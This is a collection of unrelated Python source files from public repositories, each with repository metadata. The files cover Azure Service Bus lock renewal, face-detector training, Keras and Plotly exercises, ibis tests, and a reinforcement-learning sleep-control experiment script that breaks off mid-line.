self._shutdown = asyncio.Event() self._futures: List[asyncio.Future] = [] self._sleep_time = 1 self._renew_period = 10 self._on_lock_renew_failure = on_lock_renew_failure self._max_lock_renewal_duration = max_lock_renewal_duration async def __aenter__(self) -> "AutoLockRenewer": if self._shutdown.is_set(): raise ServiceBusError( "The AutoLockRenewer has already been shutdown. Please create a new instance for" " auto lock renewing." ) return self async def __aexit__(self, *args: Iterable[Any]) -> None: await self.close() def _renewable( self, renewable: Union[ServiceBusReceivedMessage, ServiceBusSession] ) -> bool: # pylint: disable=protected-access if self._shutdown.is_set(): return False if hasattr(renewable, "_settled") and renewable._settled: # type: ignore return False if renewable._lock_expired: return False try: if not renewable._receiver._running: # type: ignore return False except AttributeError: # If for whatever reason the renewable isn't hooked up to a receiver raise ServiceBusError( "Cannot renew an entity without an associated receiver. " "ServiceBusReceivedMessage and active ServiceBusReceiver.Session objects are expected." ) return True async def _auto_lock_renew( self, receiver: ServiceBusReceiver, renewable: Renewable, starttime: datetime.datetime, max_lock_renewal_duration: float, on_lock_renew_failure: Optional[AsyncLockRenewFailureCallback] = None, renew_period_override: Optional[float] = None, ) -> None: # pylint: disable=protected-access _log.debug( "Running async lock auto-renew for %r seconds", max_lock_renewal_duration ) error: Optional[Exception] = None clean_shutdown = False # Only trigger the on_lock_renew_failure if halting was not expected (shutdown, etc) renew_period = renew_period_override or self._renew_period try: while self._renewable(renewable): if (utc_now() - starttime) >= datetime.timedelta( seconds=max_lock_renewal_duration ): _log.debug( "Reached max auto lock renew duration - letting lock expire." ) raise AutoLockRenewTimeout( "Auto-renew period ({} seconds) elapsed.".format( max_lock_renewal_duration ) ) if (renewable.locked_until_utc - utc_now()) <= datetime.timedelta( seconds=renew_period ): _log.debug( "%r seconds or less until lock expires - auto renewing.", renew_period, ) try: # Renewable is a session await renewable.renew_lock() # type: ignore except AttributeError: # Renewable is a message await receiver.renew_message_lock(renewable) # type: ignore await asyncio.sleep(self._sleep_time) clean_shutdown = not renewable._lock_expired except AutoLockRenewTimeout as e: error = e renewable.auto_renew_error = e clean_shutdown = not renewable._lock_expired except Exception as e: # pylint: disable=broad-except _log.debug("Failed to auto-renew lock: %r. Closing thread.", e) error = AutoLockRenewFailed("Failed to auto-renew lock", error=e) renewable.auto_renew_error = error finally: if on_lock_renew_failure and not clean_shutdown: await on_lock_renew_failure(renewable, error) def register( self, receiver: ServiceBusReceiver, renewable: Union[ServiceBusReceivedMessage, ServiceBusSession], max_lock_renewal_duration: Optional[float] = None, on_lock_renew_failure: Optional[AsyncLockRenewFailureCallback] = None, ) -> None: """Register a renewable entity for automatic lock renewal. :param receiver: The ServiceBusReceiver instance that is associated with the message or the session to be auto-lock-renewed. :type receiver: ~azure.servicebus.aio.ServiceBusReceiver :param renewable: A locked entity that needs to be renewed. :type renewable: Union[~azure.servicebus.aio.ServiceBusReceivedMessage,~azure.servicebus.aio.ServiceBusSession] :param max_lock_renewal_duration: A time in seconds that the lock should be maintained for. Default value is None. If specified, this value will override the default value specified at the constructor. :type max_lock_renewal_duration: Optional[float] :param Optional[AsyncLockRenewFailureCallback] on_lock_renew_failure: An async callback may be specified to be called when the lock is lost on the renewable being registered. Default value is None (no callback). :rtype: None """ if not isinstance(renewable, (ServiceBusReceivedMessage, ServiceBusSession)): raise TypeError( "AutoLockRenewer only supports registration of types " "azure.servicebus.ServiceBusReceivedMessage (via a receiver's receive methods) and " "azure.servicebus.aio.ServiceBusSession " "(via a session receiver's property receiver.session)." ) if self._shutdown.is_set(): raise ServiceBusError( "The AutoLockRenewer has already been shutdown. Please create a new instance for" " auto lock renewing." ) if renewable.locked_until_utc is None: raise ValueError( "Only azure.servicebus.ServiceBusReceivedMessage objects in PEEK_LOCK receive mode may" "be lock-renewed. (E.g. only messages received via receive() or the receiver iterator," "not using RECEIVE_AND_DELETE receive mode, and not returned from Peek)" ) starttime = get_renewable_start_time(renewable) # This is a heuristic to compensate if it appears the user has a lock duration less than our base renew period time_until_expiry = get_renewable_lock_duration(renewable) renew_period_override = None # Default is 10 seconds, but let's leave ourselves a small margin of error because clock skew is a real problem if time_until_expiry <= datetime.timedelta( seconds=self._renew_period + SHORT_RENEW_OFFSET ): renew_period_override = ( time_until_expiry.seconds * SHORT_RENEW_SCALING_FACTOR ) renew_future = asyncio.ensure_future( self._auto_lock_renew( receiver, renewable, starttime, max_lock_renewal_duration or self._max_lock_renewal_duration, on_lock_renew_failure or self._on_lock_renew_failure, renew_period_override, ), **self._internal_kwargs ) self._futures.append(renew_future) async def close(self) -> None: """Cease autorenewal by cancelling any remaining open lock renewal futures.""" self._shutdown.set() if self._futures: await asyncio.wait(self._futures)
af8bdce8b06b56c4b156043cf40cb6163573214a
813212a9a3f211c25c4765795ed252d74b0273dd
/main.py
1a8a253f008ccfeffd0ee5c0f2d0d54952d151e8
[]
no_license
Suke0/DSFD_pytorch
0228963441e75f62f1588e37a22e86c90340a0a9
a8ae0f4930acdd81e05f73941a8b397daa35c489
refs/heads/master
2022-03-19T06:45:32.663406
2019-11-19T14:47:38
2019-11-19T14:47:38
null
0
0
null
null
null
null
UTF-8
Python
false
false
14,535
py
from __future__ import division from __future__ import absolute_import from __future__ import print_function import os import time import shutil import argparse import torch import torch.nn as nn import torch.optim as optim import torch.nn.init as init import torch.utils.data as data import numpy as np from torch.autograd import Variable import torch.distributed as dist import torch.backends.cudnn as cudnn from data.config import cfg from data.widerface import WIDERDetection, detection_collate from layers.modules import MultiBoxLoss from layers.functions import PriorBox from models.factory import build_net, basenet_factory parser = argparse.ArgumentParser( description='DSFD face Detector Training With Pytorch') parser.add_argument('--model',default='vgg', type=str, choices=['vgg', 'resnet50', 'resnet101', 'resnet152'], help='model for training') parser.add_argument('--basenet',default='vgg16_reducedfc.pth', help='Pretrained base model') parser.add_argument('--epochs', default=90, type=int, metavar='N', help='number of total epochs to run') parser.add_argument('--start-epoch', default=0, type=int, metavar='N', help='manual epoch number (useful on restarts)') parser.add_argument('--batch_size',default=2, type=int, help='Batch size for training') parser.add_argument('--pretrained', default=True, type=str, help='use pre-trained model') parser.add_argument('--resume',default=None, type=str, help='Checkpoint state_dict file to resume training from') parser.add_argument('--num_workers',default=4, type=int, help='Number of workers used in dataloading') parser.add_argument('--distributed', default=True, type=str, help='use distribute training') parser.add_argument("--local_rank", default=0, type=int) parser.add_argument('--lr', '--learning-rate',default=1e-3, type=float, help='initial learning rate') parser.add_argument('--momentum',default=0.9, type=float, help='Momentum value for optim') parser.add_argument('--weight_decay',default=5e-4, type=float, help='Weight decay for SGD') parser.add_argument('--print-freq', '-p', default=10, type=int, metavar='N', help='print frequency (default: 10)') parser.add_argument('--save_folder',default='weights/', help='Directory for saving checkpoint models') parser.add_argument('--prefix',default='dsfd_', help='the prefix for saving checkpoint models') args = parser.parse_args() cudnn.benchmark = True args = parser.parse_args() minmum_loss = np.inf args.distributed = False if 'WORLD_SIZE' in os.environ: args.distributed = int(os.environ['WORLD_SIZE']) > 1 if not os.path.exists(args.save_folder): os.mkdir(args.save_folder) def main(): global args global minmum_loss args.gpu = 0 args.world_size = 1 if args.distributed: args.gpu = args.local_rank % torch.cuda.device_count() torch.cuda.set_device(args.gpu) torch.distributed.init_process_group(backend='nccl', init_method='env://') args.world_size = torch.distributed.get_world_size() args.total_batch_size = args.world_size * args.batch_size # build dsfd network print("Building net...") basenet = basenet_factory(args.model) dsfd_net = build_net('train', cfg.NUM_CLASSES, args.model) model = dsfd_net if args.pretrained: base_weights = torch.load(args.save_folder + args.basenet) print('Load base network {}'.format(args.save_folder + basenet)) if args.model == 'vgg': model.vgg.load_state_dict(base_weights) else: model.resnet.load_state_dict(base_weights) # for multi gpu if args.distributed: model = torch.nn.parallel.DistributedDataParallel(model) model = model.cuda() # optimizer and loss function optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay) criterion = MultiBoxLoss(cfg, True) # optionally resume from a checkpoint if args.resume: if os.path.isfile(args.resume): print("=> loading checkpoint '{}'".format(args.resume)) checkpoint = torch.load(args.resume, map_location=lambda storage, loc: storage.cuda(args.gpu)) args.start_epoch = checkpoint['epoch'] minmum_loss = checkpoint['minmum_loss'] model.load_state_dict(checkpoint['state_dict']) optimizer.load_state_dict(checkpoint['optimizer']) print("=> loaded checkpoint '{}' (epoch {})" .format(args.resume, checkpoint['epoch'])) else: print("=> no checkpoint found at '{}'".format(args.resume)) else: print('Initializing weights...') dsfd_net.extras.apply(dsfd_net.weights_init) dsfd_net.fpn_topdown.apply(dsfd_net.weights_init) dsfd_net.fpn_latlayer.apply(dsfd_net.weights_init) dsfd_net.fpn_fem.apply(dsfd_net.weights_init) dsfd_net.loc_pal1.apply(dsfd_net.weights_init) dsfd_net.conf_pal1.apply(dsfd_net.weights_init) dsfd_net.loc_pal2.apply(dsfd_net.weights_init) dsfd_net.conf_pal2.apply(dsfd_net.weights_init) print('Loading wider dataset...') train_dataset = WIDERDetection(cfg.FACE.TRAIN_FILE, mode='train') val_dataset = WIDERDetection(cfg.FACE.VAL_FILE, mode='val') train_loader = data.DataLoader(train_dataset, args.batch_size, num_workers=args.num_workers, shuffle=True, collate_fn=detection_collate, pin_memory=True) val_batchsize = args.batch_size // 2 val_loader = data.DataLoader(val_dataset, val_batchsize, num_workers=args.num_workers, shuffle=False, collate_fn=detection_collate, pin_memory=True) print('Using the specified args:') print(args) # load PriorBox with torch.no_grad(): priorbox1 = PriorBox(input_size=[640,640], cfg=cfg, pal=1) priors_pal1 = priorbox1.forward() priors_pal1 = priors_pal1.cuda() priorbox2 = PriorBox(input_size=[640,640], cfg=cfg, pal=2) priors_pal2 = priorbox2.forward() priors_pal2 = priors_pal2.cuda() for epoch in range(args.start_epoch, args.epochs): # train for one epoch end = time.time() train_loss = train(train_loader, model, priors_pal1, priors_pal2, criterion, optimizer, epoch) val_loss = val(val_loader, model, priors_pal1, priors_pal2, criterion) if args.local_rank == 0: is_best = val_loss < minmum_loss minmum_loss = min(val_loss, minmum_loss) save_checkpoint({ 'epoch': epoch + 1, 'state_dict': model.state_dict(), 'best_prec1': minmum_loss, 'optimizer': optimizer.state_dict(), }, is_best, epoch) epoch_time = time.time() -end print('Epoch %s time cost %f' %(epoch, epoch_time)) def train(train_loader, model, priors_pal1, priors_pal2, criterion, optimizer, epoch): batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() loc_loss = AverageMeter() cls_loss = AverageMeter() # switch to train mode model.train() end = time.time() for i, data in enumerate(train_loader, 1): input, targets = data train_loader_len = len(train_loader) adjust_learning_rate(optimizer, epoch, i, train_loader_len) # measure data loading time data_time.update(time.time() - end) input_var = Variable(input.cuda()) target_var = [Variable(ann.cuda(), requires_grad=False) for ann in targets] # compute output output = model(input_var) loss_l_pa1l, loss_c_pal1 = criterion(output[0:2], priors_pal1, target_var) loss_l_pa12, loss_c_pal2 = criterion(output[2:4], priors_pal2, target_var) loss = loss_l_pa1l + loss_c_pal1 + loss_l_pa12 + loss_c_pal2 loss_l = loss_l_pa1l + loss_l_pa12 loss_c = loss_c_pal1 + loss_c_pal2 if args.distributed: reduced_loss = reduce_tensor(loss.data) reduced_loss_l = reduce_tensor(loss_l.data) reduced_loss_c = reduce_tensor(loss_c.data) else: reduced_loss = loss.data reduced_loss_l = loss_l.data reduced_loss_c = loss_c.data losses.update(to_python_float(reduced_loss), input.size(0)) loc_loss.update(to_python_float(reduced_loss_l), input.size(0)) cls_loss.update(to_python_float(reduced_loss_c), input.size(0)) # compute gradient and do SGD step optimizer.zero_grad() loss.backward() optimizer.step() torch.cuda.synchronize() # measure elapsed time batch_time.update(time.time() - end) end = time.time() if args.local_rank == 0 and i % args.print_freq == 0 and i >= 0: print('Epoch: [{0}][{1}/{2}]\t' 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t' 'Speed {3:.3f} ({4:.3f})\t' 'Data {data_time.val:.3f} ({data_time.avg:.3f})\t' 'Loss {loss.val:.4f} ({loss.avg:.4f})\t' 'loc_loss {loc_loss.val:.3f} ({loc_loss.avg:.3f})\t' 'cls_loss {cls_loss.val:.3f} ({cls_loss.avg:.3f})'.format( epoch, i, train_loader_len, args.total_batch_size / batch_time.val, args.total_batch_size / batch_time.avg, batch_time=batch_time, data_time=data_time, loss=losses, loc_loss=loc_loss, cls_loss=cls_loss)) return losses.avg def val(val_loader, model, priors_pal1, priors_pal2, criterion): batch_time = AverageMeter() data_time = AverageMeter() losses = AverageMeter() loc_loss = AverageMeter() cls_loss = AverageMeter() # switch to train mode model.eval() end = time.time() for i, data in enumerate(val_loader, 1): input, targets = data val_loader_len = len(val_loader) # measure data loading time data_time.update(time.time() - end) input_var = Variable(input.cuda()) target_var = [Variable(ann.cuda(), requires_grad=False) for ann in targets] # compute output output = model(input_var) loss_l_pa1l, loss_c_pal1 = criterion(output[0:2], priors_pal1, target_var) loss_l_pa12, loss_c_pal2 = criterion(output[2:4], priors_pal2, target_var) loss = loss_l_pa1l + loss_c_pal1 + loss_l_pa12 + loss_c_pal2 loss_l = loss_l_pa1l + loss_l_pa12 loss_c = loss_c_pal1 + loss_c_pal2 if args.distributed: reduced_loss = reduce_tensor(loss.data) reduced_loss_l = reduce_tensor(loss_l.data) reduced_loss_c = reduce_tensor(loss_c.data) else: reduced_loss = loss.data reduced_loss_l = loss_l.data reduced_loss_c = loss_c.data losses.update(to_python_float(reduced_loss), input.size(0)) loc_loss.update(to_python_float(reduced_loss_l), input.size(0)) cls_loss.update(to_python_float(reduced_loss_c), input.size(0)) torch.cuda.synchronize() # measure elapsed time batch_time.update(time.time() - end) end = time.time() if args.local_rank == 0 and i % args.print_freq == 0 and i >= 0: print('[{0}/{1}]\t' 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t' 'Speed {2:.3f} ({3:.3f})\t' 'Data {data_time.val:.3f} ({data_time.avg:.3f})\t' 'Loss {loss.val:.4f} ({loss.avg:.4f})\t' 'loc_loss {loc_loss.val:.3f} ({loc_loss.avg:.3f})\t' 'cls_loss {cls_loss.val:.3f} ({cls_loss.avg:.3f})'.format( i, val_loader_len, args.total_batch_size / batch_time.val, args.total_batch_size / batch_time.avg, batch_time=batch_time, data_time=data_time, loss=losses, loc_loss=loc_loss, cls_loss=cls_loss)) return losses.avg def to_python_float(t): if hasattr(t, 'item'): return t.item() else: return t[0] class AverageMeter(object): """Computes and stores the average and current value""" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count = 0 def update(self, val, n=1): self.val = val self.sum += val * n self.count += n self.avg = self.sum / self.count def reduce_tensor(tensor): rt = tensor.clone() dist.all_reduce(rt, op=dist.reduce_op.SUM) rt /= args.world_size return rt def adjust_learning_rate(optimizer, epoch, step, len_epoch): """LR schedule that should yield 76% converged accuracy with batch size 256""" factor = epoch // 10 if epoch >= 30: factor = factor + 1 lr = args.lr * (0.1 ** factor) """Warmup""" if epoch < 1: lr = lr * float(1 + step + epoch * len_epoch) / (5. * len_epoch) if(args.local_rank == 0 and step % args.print_freq == 0 and step > 1): print("Epoch = {}, step = {}, lr = {}".format(epoch, step, lr)) for param_group in optimizer.param_groups: param_group['lr'] = lr def save_checkpoint(state, is_best, epoch): filename = os.path.join(args.save_folder, args.prefix + str(epoch)+ ".pth") torch.save(state, filename) if is_best: shutil.copyfile(filename, os.path.join(args.save_folder, 'model_best.pth')) if __name__ == '__main__': main()
72d0a91efae53216da61610416aa816a93f0d33a
a6ef13387c24c719a0dcfeb173521cd70beac282
/python1/mod_call_fibs.py
9415180ce0991ba45b0e4e2af1218228cf63e8c3
[]
no_license
youjiahe/python
f60472d61daf58b7f5bb6aa557949de4babf8c9c
74eb4c5ba211ae5ffed2040576e5eead75d16e7d
refs/heads/master
2020-03-31T02:35:55.787809
2019-12-02T16:32:54
2019-12-02T16:32:54
151,831,735
0
0
null
null
null
null
UTF-8
Python
false
false
118
py
#!/usr/bin/env python3 import mod_fibs import mod_fibs as f from mod_fibs import fib mod_fibs.fib() f.fib(5) fib(10)
605cceafb7745578da0e5040c7db03dccc5e5ffc
c5b69745b12ad36241fa792af44480eb70918cb0
/ibis/tests/expr/test_literal.py
d43226d69d94263d4b54d263c8d01711f06d49e2
[ "Apache-2.0" ]
permissive
vishalbelsare/ibis
bdbfde79086b268f4592cde009e0ffa52ece97e6
3fd6afb223fa442ccd0d9db69a74a431d5e7bcca
refs/heads/master
2023-08-16T16:23:00.535467
2021-11-23T15:33:35
2021-11-23T15:33:35
141,067,229
0
0
Apache-2.0
2021-11-29T20:12:43
2018-07-16T00:06:27
Python
UTF-8
Python
false
false
1,388
py
import ibis from ibis.expr import datatypes from ibis.expr.operations import Literal from ibis.tests.util import assert_pickle_roundtrip def test_literal_equality_basic(): a = ibis.literal(1).op() b = ibis.literal(1).op() assert a == b assert hash(a) == hash(b) def test_literal_equality_int_float(): # Note: This is different from the Python behavior for int/float comparison a = ibis.literal(1).op() b = ibis.literal(1.0).op() assert a != b def test_literal_equality_int16_int32(): # Note: This is different from the Python behavior for int/float comparison a = Literal(1, datatypes.int16) b = Literal(1, datatypes.int32) assert a != b def test_literal_equality_int_interval(): a = ibis.literal(1).op() b = ibis.interval(seconds=1).op() assert a != b def test_literal_equality_interval(): a = ibis.interval(seconds=1).op() b = ibis.interval(minutes=1).op() assert a != b # Currently these does't equal, but perhaps should be? c = ibis.interval(seconds=60).op() d = ibis.interval(minutes=1).op() assert c != d def test_pickle_literal(): a = Literal(1, datatypes.int16) b = Literal(1, datatypes.int32) assert_pickle_roundtrip(a) assert_pickle_roundtrip(b) def test_pickle_literal_interval(): a = ibis.interval(seconds=1).op() assert_pickle_roundtrip(a)
ae33e5e64e5edcb987ff8edd262f7a45e2a61f7b
48c4dda8fbecb5bc9506eb0a318508c9a9f37aca
/deep learning from scratch.py
e10c1b2aa591751efd915dc08f92debac8407696
[]
no_license
bigeyesung/DLkaggle
f59e8e2fdac430fd5e97cfc67e63c837a8b12cee
f57b10740b206ecff1bcbfdc7d4436ac8dcac28d
refs/heads/master
2023-07-05T22:16:03.042595
2021-08-07T15:48:54
2021-08-07T15:48:54
262,594,538
0
0
null
null
null
null
UTF-8
Python
false
false
2,766
py
import numpy as np from sklearn.model_selection import train_test_split from tensorflow import keras img_rows, img_cols = 28, 28 num_classes = 10 def prep_data(raw): y = raw[:, 0] out_y = keras.utils.to_categorical(y, num_classes) x = raw[:,1:] num_images = raw.shape[0] out_x = x.reshape(num_images, img_rows, img_cols, 1) out_x = out_x / 255 return out_x, out_y fashion_file = "../input/fashionmnist/fashion-mnist_train.csv" fashion_data = np.loadtxt(fashion_file, skiprows=1, delimiter=',') x, y = prep_data(fashion_data) # Set up code checking from learntools.core import binder binder.bind(globals()) from learntools.deep_learning.exercise_7 import * print("Setup Complete") # 1) Start the model from tensorflow import keras from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, Flatten, Conv2D fashion_model= Sequential() # Add the first layer fashion_model.add(Conv2D(12,kernel_size=3,activation='relu',input_shape=(img_rows,img_cols,1))) #3) Add the remaining layers fashion_model.add(Conv2D(20,kernel_size=3,activation='relu')) fashion_model.add(Conv2D(20,kernel_size=3,activation='relu')) fashion_model.add(Flatten()) fashion_model.add(Dense(100,activation='relu')) fashion_model.add(Dense(num_classes, activation='softmax')) # 4) Compile Your Model fashion_model.compile(loss=keras.losses.categorical_crossentropy,optimizer='adam',metrics=['accuracy']) # 5) Fit The Model fashion_model.fit(x,y,batch_size=100,epochs=4,validation_split=0.2) # 6) Create A New Model second_fashion_model = Sequential() second_fashion_model.add(Conv2D(12, activation='relu', kernel_size=3, input_shape = (img_rows, img_cols, 1))) # Changed kernel sizes to be 2 second_fashion_model.add(Conv2D(20, activation='relu', kernel_size=2)) second_fashion_model.add(Conv2D(20, activation='relu', kernel_size=2)) # added an addition Conv2D layer second_fashion_model.add(Conv2D(20, activation='relu', kernel_size=2)) second_fashion_model.add(Flatten()) second_fashion_model.add(Dense(100, activation='relu')) # It is important not to change the last layer. First argument matches number of classes. Softmax guarantees we get reasonable probabilities second_fashion_model.add(Dense(10, activation='softmax')) second_fashion_model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) second_fashion_model.fit(x, y, batch_size=100, epochs=4, validation_split=0.2) #second_fashion_model.add(Conv2D(30,kernel_size=3,activation='relu',input_shape=(img_rows,img_cols,1))) #second_fashion_model.fit(x,y,batch_size=100,epochs=4,validation_split=0.2)
9cdfc43db870a09854c65404a963963d2cb4b43d
bbf744bfbfd9a935bd98c7cf54152a5d41194161
/chapter_15/die_visual.py
d9629d134497d4af77867b78e009e95a6471a52b
[]
no_license
terranigmark/python-crash-course-projects
65a7863be2d26fe8b91ac452b12203386eb0259a
79ed9ed8e6a1bf015990a9556689379274231d13
refs/heads/master
2022-12-05T21:59:00.352140
2020-08-21T04:59:50
2020-08-21T04:59:50
266,263,493
0
0
null
null
null
null
UTF-8
Python
false
false
918
py
from plotly.graph_objs import Bar, Layout from plotly import offline from die import Die # create a D6 die_1 = Die() die_2 = Die(10) # make some rolls and store results in a list results = [] for roll_num in range(50_000): result = die_1.roll() + die_2.roll() results.append(result) # analyze the results frequencies = [] max_result = die_1.num_sides + die_2.num_sides for value in range(2, die_1.num_sides + die_2.num_sides): frequency = results.count(value) frequencies.append(frequency) # visualize the results x_values = list(range(2, max_result + 1)) data = [Bar(x = x_values, y = frequencies)] x_axis_config = {'title': 'Result', 'dtick': 1} y_axis_config = {'title': 'Frequency of Result'} my_layout = Layout(title = 'Results of rolling two D6 and D10 50,000 times', xaxis = x_axis_config, yaxis = y_axis_config) offline.plot({'data': data, 'layout': my_layout}, filename = 'd6_d10.html')
cc0f68e8359cb95579b7d20bc6c3581cdc712cbd
5e5e99e8493fbef64847494caf059c910c03c823
/arrays/palindromic-substrings.py
b398b82336fa0371d58df3ab24c16dec63daf978
[]
no_license
jcockbain/leetcode-python
f4e487b13ae4cacef9cbedfd4358f8ee0006e2b8
d7f83ea5a11e4c8340c48698d29aa3bc0b942121
refs/heads/master
2020-07-09T19:58:42.933881
2019-10-28T23:34:34
2019-10-28T23:34:34
null
0
0
null
null
null
null
UTF-8
Python
false
false
362
py
def countSubstrings(self, s): """ :type s: str :rtype: int """ N = len(s) ans = 0 for center in range(2*N - 1): left = center / 2 right = left + center % 2 while left >= 0 and right < N \ and s[left] == s[right]: ans += 1 left -= 1 right += 1 return ans
0ba3ed98a522196a66863cdd0ce816654065b1b2
96a34a048c783a75736bf0ec775df22142f9ee53
/services/web/server/src/simcore_service_webserver/db_listener/plugin.py
a4fda5b69bdff33c6386eee2e702f5c74e8bbb01
[ "MIT" ]
permissive
ITISFoundation/osparc-simcore
77e5b9f7eb549c907f6ba2abb14862154cc7bb66
f4c57ffc7b494ac06a2692cb5539d3acfd3d1d63
refs/heads/master
2023-08-31T17:39:48.466163
2023-08-31T15:03:56
2023-08-31T15:03:56
118,596,920
39
29
MIT
2023-09-14T20:23:09
2018-01-23T10:48:05
Python
UTF-8
Python
false
false
870
py
""" computation module is the main entry-point for computational backend """ import logging from aiohttp import web from servicelib.aiohttp.application_setup import ModuleCategory, app_module_setup from ..db.plugin import setup_db from ..projects.db import setup_projects_db from ..rabbitmq import setup_rabbitmq from ..socketio.plugin import setup_socketio from ._db_comp_tasks_listening_task import create_comp_tasks_listening_task _logger = logging.getLogger(__name__) @app_module_setup( __name__, ModuleCategory.ADDON, settings_name="WEBSERVER_DB_LISTENER", logger=_logger, ) def setup_db_listener(app: web.Application): setup_rabbitmq(app) setup_socketio(app) setup_projects_db(app) # Creates a task to listen to comp_task pg-db's table events setup_db(app) app.cleanup_ctx.append(create_comp_tasks_listening_task)
2671fbfa345590729a83bef8261428be9a1bf018
f8d5c4eb0244c4a227a615bc11c4c797760c3bec
/utils/rldraw.py
2e944f936c3ad5ea6d074a6f0f9d74759cdd0c70
[]
no_license
SamPlvs/reinforcement_learning_pytorch
e9b84659f870d938814177f1288fa4a2eb152599
ffb9e53eeff011c4d3d5933a60c2b65fdbb18e2a
refs/heads/master
2020-03-23T04:08:51.778325
2018-01-16T22:36:48
2018-01-16T22:36:48
null
0
0
null
null
null
null
UTF-8
Python
false
false
475
py
import matplotlib.pyplot as plt import numpy as np def reward_episode(rewards, image_path, env_name='', method_name='', comment=''): reward_list = rewards total_num = np.shape(reward_list)[0] fig = plt.figure() ax = fig.add_subplot(111) ax.plot(list(range(total_num)), reward_list) ax.set_xlabel('iteration') ax.set_ylabel('rewards') fig.suptitle("rewards_episodes_{}_{}_{}".format(env_name, method_name, comment)) fig.savefig(image_path)
5a75b3e5fcce03f7bd10d309196f67bdbc85c252
1d641f71f7aab082ed0b3ee805d6ff24b012ca2d
/ecommerce/carts/urls.py
aacdcfc353ac76fe4c2a60b52d83aa8708090caa
[]
no_license
Arkajit-m18/django-mca-major-project
3d63ac96cd32c49e9a95629a680c5b0b7561cbd3
59b6f39d923a7e134bbb4bbb769bc06721321760
refs/heads/master
2020-05-18T00:31:44.435948
2019-05-15T15:23:21
2019-05-15T15:23:21
184,065,280
1
0
null
null
null
null
UTF-8
Python
false
false
334
py
from django.urls import path from . import views app_name = 'carts' urlpatterns = [ path('', views.cart_home, name = 'cart_home'), path('update/', views.cart_update, name = 'cart_update'), path('checkout/', views.checkout_home, name = 'checkout'), path('checkout/success/', views.checkout_done, name = 'success'), ]
ca0d04658eb03c43a7dceddf7338d8c1f5cd372f
346cf248e94fe97ba9c0a841827ab77f0ed1ff20
/experiments/kdd-exps/experiment_DynaQtable_130_Feb14_0029.py
efabd8516978796f715bed1b20adcd12deaf5f2b
[ "BSD-3-Clause" ]
permissive
huangxf14/deepnap
cae9c7c654223f6202df05b3c3bc5053f9bf5696
b4627ce1b9022d4f946d9b98d8d1622965cb7968
refs/heads/master
2020-03-26T02:54:01.352883
2018-08-12T01:55:14
2018-08-12T01:55:14
144,429,728
0
0
null
null
null
null
UTF-8
Python
false
false
4,623
py
# System built-in modules import time from datetime import datetime import sys import os from multiprocessing import Pool # Project dependency modules import pandas as pd pd.set_option('mode.chained_assignment', None) # block warnings due to DataFrame value assignment import lasagne # Project modules sys.path.append('../') from sleep_control.traffic_emulator import TrafficEmulator from sleep_control.traffic_server import TrafficServer from sleep_control.controller import QController, DummyController, NController from sleep_control.integration import Emulation from sleep_control.env_models import SJTUModel from rl.qtable import QAgent from rl.qnn_theano import QAgentNN from rl.mixin import PhiMixin, DynaMixin sys_stdout = sys.stdout log_prefix = '_'.join(['msg'] + os.path.basename(__file__).replace('.', '_').split('_')[1:5]) log_file_name = "{}_{}.log".format(log_prefix, sys.argv[1]) # Composite classes class Dyna_QAgent(DynaMixin, QAgent): def __init__(self, **kwargs): super(Dyna_QAgent, self).__init__(**kwargs) # Parameters # |- Data location = 'gym' # |- Agent # |- QAgent actions = [(True, None), (False, 'serve_all')] gamma, alpha = 0.9, 0.9 # TD backup explore_strategy, epsilon = 'epsilon', 0.02 # exploration # |- QAgentNN # | - No Phi phi_length = 0 dim_state = (1, 1, 3) range_state = ((((0, 10), (0, 10), (0, 10)),),) # | - Other params momentum, learning_rate = 0.9, 0.01 # SGD num_buffer, memory_size, batch_size, update_period, freeze_period = 2, 200, 100, 4, 16 reward_scaling, reward_scaling_update, rs_period = 1, 'adaptive', 32 # reward scaling # |- Env model model_type, traffic_window_size = 'IPP', 50 stride, n_iter, adjust_offset = 2, 3, 1e-22 eval_period, eval_len = 4, 100 n_belief_bins, max_queue_len = 5, 20 Rs, Rw, Rf, Co, Cw = 1.0, -1.0, -10.0, -5.0, -0.5 traffic_params = (model_type, traffic_window_size, stride, n_iter, adjust_offset, eval_period, eval_len, n_belief_bins) queue_params = (max_queue_len,) beta = 0.5 # R = (1-beta)*ServiceReward + beta*Cost reward_params = (Rs, Rw, Rf, Co, Cw, beta) # |- DynaQ num_sim = 5 # |- Env # |- Time start_time = pd.to_datetime("2014-10-15 09:40:00") total_time = pd.Timedelta(days=7) time_step = pd.Timedelta(seconds=2) backoff_epochs = num_buffer*memory_size+phi_length head_datetime = start_time - time_step*backoff_epochs tail_datetime = head_datetime + total_time TOTAL_EPOCHS = int(total_time/time_step) # |- Reward rewarding = {'serve': Rs, 'wait': Rw, 'fail': Rf} # load from processed data session_df =pd.read_csv( filepath_or_buffer='../data/trace_{}.dat'.format(location), parse_dates=['startTime_datetime', 'endTime_datetime'] ) te = TrafficEmulator( session_df=session_df, time_step=time_step, head_datetime=head_datetime, tail_datetime=tail_datetime, rewarding=rewarding, verbose=2) ts = TrafficServer(cost=(Co, Cw), verbose=2) env_model = SJTUModel(traffic_params, queue_params, reward_params, 2) agent = Dyna_QAgent( env_model=env_model, num_sim=num_sim, # Below is QAgent params actions=actions, alpha=alpha, gamma=gamma, explore_strategy=explore_strategy, epsilon=epsilon, verbose=2) c = QController(agent=agent) emu = Emulation(te=te, ts=ts, c=c, beta=beta) # Heavyliftings t = time.time() sys.stdout = sys_stdout log_path = './log/' if os.path.isfile(log_path+log_file_name): print "Log file {} already exist. Experiment cancelled.".format(log_file_name) else: log_file = open(log_path+log_file_name,"w") print datetime.now().strftime('[%Y-%m-%d %H:%M:%S]'), print '{}%'.format(int(100.0*emu.epoch/TOTAL_EPOCHS)), print log_file_name time.sleep(1) sys.stdout = log_file while emu.epoch is not None and emu.epoch<TOTAL_EPOCHS: # log time print "Epoch {},".format(emu.epoch), left = emu.te.head_datetime + emu.te.epoch*emu.te.time_step right = left + emu.te.time_step print "{} - {}".format(left.strftime("%Y-%m-%d %H:%M:%S"), right.strftime("%Y-%m-%d %H:%M:%S")) emu.step() print if emu.epoch%(0.05*TOTAL_EPOCHS)==0: sys.stdout = sys_stdout print datetime.now().strftime('[%Y-%m-%d %H:%M:%S]'), print 